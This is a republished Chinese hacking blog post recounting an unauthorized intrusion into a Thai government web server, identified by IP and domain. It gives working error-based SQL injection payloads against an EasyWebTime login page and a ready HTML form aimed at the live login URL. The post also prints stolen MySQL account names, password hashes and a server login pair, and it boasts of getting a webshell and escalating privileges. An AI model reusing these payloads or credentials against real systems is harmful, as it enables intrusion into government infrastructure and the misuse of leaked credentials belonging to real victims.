zoukankan      html  css  js  c++  java
  • 捅伊朗黑客PP — 后台登陆POST+错误回显 注入

    看了一个泰国政府的网站被伊朗的黑客挂页,上面写着
    “Your Box 0wn3z By Behrooz_Ice – Q7x -Sha2ow -Virangar -Ali_Eagle -iman_taktaz – Satanic2000”
    “We Love Iran”
    “Ashiyane Digital Security Team”
    这样的话云云。一些中国的傻逼还拿着别人的黑页去zone-h去提交,感觉受不了这么傻逼的事情,就跟着犯了傻逼,捅了人家的PP
    下面我就讲讲怎么捅了他们的PP(http://203.154.183.18/ash_hack.htm)
    作者:YoCo Smart
    来自:Silic Group Hacker Army

    http://blackbap.org

    网站服务器ip为:203.154.183.18上面一共有大约一百多个xx.cad.go.th(泰国政府域名后缀)的网站
    包括主域名:www.cad.go.th(www.cad.go.th/webadmin/)
    我先是看了看上面站的构架,基本上都是一个模板出来的,似乎有点脚本问题,不过不从这边下手。直接访问ip可以看到一个管理后台

    看了看这个后台,上面写着EasyWebTime 8.6,不知道是什么东西。然后我就用
    用户名:admin’or 1=1# 密码任意123456登陆,得到如下回显:

    INSERT INTO log_user (log_date , log_time , log_mid , log_user , log_date_text , log_ip , log_module , log_module_detail , log_detail ) VALUES (’2011-11-19′, ’10:39:41′, ”, ‘admin’or 1=1#’, ’19/11/2011 10:39:41′, ’24.77.19.26′, ‘login’, ‘login’, ‘เข้าสู่ระบบ’)
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” at line 1

    关键的地方不是这个INSERT INTO这个错误,关键是

    1. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” at line 1

    复制代码

    这个地方,说明后台有POST注入,而且有数据库错误回显。
    这样的话,构建一个SQL注入的POST语句即可,通过错误回显来注入出想要的信息。

    错误回显注入很简单,套公式就行了
    用户名填写:

    1. admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() limit 0,1))a from information_schema.tables group by a)b#

    复制代码

    密码任意,点击登陆,提示用户名错误

     

    估计是Javascript在作怪,绕过这个很简单,考虑到后面注入的简便性,干脆写了一个html文档:

    1. <form name=”form1″ method=”post” action=”http://203.154.183.18/login.php”>
    2. <textarea rows=”5″ style=”font-family:Times New Roman;font-size:14pt;” cols=”80″ name=”EWT_User”>admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() from mysql.user limit 0,1))a from information_schema.tables group by a)b#</textarea>
    3. <input name=”EWT_Password” type=”password” id=”EWT_Password” size=”22″ value=”xxxx” />
    4. <input name=”Submit” type=”submit” value=”Login” />
    5. <input name=”Flag” type=”hidden” id=”Flag” value=”Login” />
    6. <input name=”password_hidden” type=”password” style=”display:none” value=”Welcome” size=”10″ />
    7. <input name=”password_hidden” type=”password” style=”display:none” value=”Welcome” size=”10″ />
    8. <input name=”password_hidden” type=”password” style=”display:none” value=”Welcome” size=”10″ />
    9. </form>

    复制代码

    其实很简单,line 1里面的method表示提交方法为POST,后面的action为提交到的地址,这是从登陆页面上面直接扒下来的,但是action这个地址是完整的url地址。再往后面的就比较简单看了,保存为xx.html然后访问,在第一个文本框中输入注入语句即可。
    注入语句是这样的:

    1. admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() from mysql.user limit 0,1))a from information_schema.tables group by a)b#

    复制代码

    于是得到了回显如下:

    SELECT * FROM user_info WHERE EWT_User = ‘admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() from mysql.user limit 0,1))a from information_schema.tables group by a)b#’ AND EWT_Pass = ‘ea416ed0759d46a8de58f63a59077499′ AND EWT_Status = ‘Y’
    Duplicate entry ’1bizpoten@203.154.183.18′ for key 1

    后面的Duplicate entry ’1bizpoten@203.154.183.18′ for key 1就是想要的注入结果(去掉前面的固定数字’1′)
    注入语句中的

    1. select user() from mysql.user limit 0,1

    复制代码

    换成想要的注入语句即可,例如:

    1. select user from mysql.user where host=’%’ limit 0,1

    复制代码

    因为每次注入得到的信息只有一条,所以比较吃力
    但是最后我注入总结的信息如下:
    mysql账户:
    用户名: 密码哈希
    kk *8B9BA157688A49AFBE7513677DCD4F7C43257018 %
    bizpoten *7F6E575FAD18674CADD3B8495C79FBA5B58090D1//!2QwAsZx %
    webboard *51E610BE77CF0F81D2861AF180B496D1CA2A7637 localhost
    root 密码空 127.0.0.1
    数据库中得数据表段:

    1. admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=database() limit 0,1))a from information_schema.tables group by a)b#

    复制代码

    大概有70多个,中间跳着过去的,没把表全列出来,具体我忘了,最后面的user_info引起了我的注意:
    amphur,article_list,block,block_text,blog_category,blog_comment,org_type,user_info
    最后得到服务器的203.154.183.18的登录名和密码为:template/template
    取到webshell也就不难了
    当然,服务器是windows,装了卡巴斯基,国内的360根本就不是和卡巴斯基一个档次的,提权颇费周折。。。不过。。。菊花聊天室已经挂上了

    http://www.cad.go.th/webadmin/

    本站内容均为原创,转载请务必保留署名与链接!
    捅伊朗黑客PP — 后台登陆POST+错误回显 注入:http://www.webshell.cc/2392.html
  • 相关阅读:
    sencha touch 扩展篇之将sencha touch打包成安装程序(上)- 使用sencha cmd打包安装程序
    sencha touch 扩展篇之使用sass自定义主题样式 (下)通过css修改官方组件样式以及自定义图标
    一个不错的android组件的网站
    sencha touch 扩展篇之使用sass自定义主题样式 (上)使用官方的api修改主题样式
    sencha touch 入门系列 (九) sencha touch 布局layout
    面试题总结
    国外接活网站Elance, Freelancer和ScriptLance的介绍和对比
    sencha touch 入门系列 扩展篇之sencha touch 项目打包压缩
    Android Design Support Library——Navigation View
    设计模式——命令模式
  • 原文地址:https://www.cnblogs.com/cnsanshao/p/3160628.html
Copyright © 2011-2022 走看看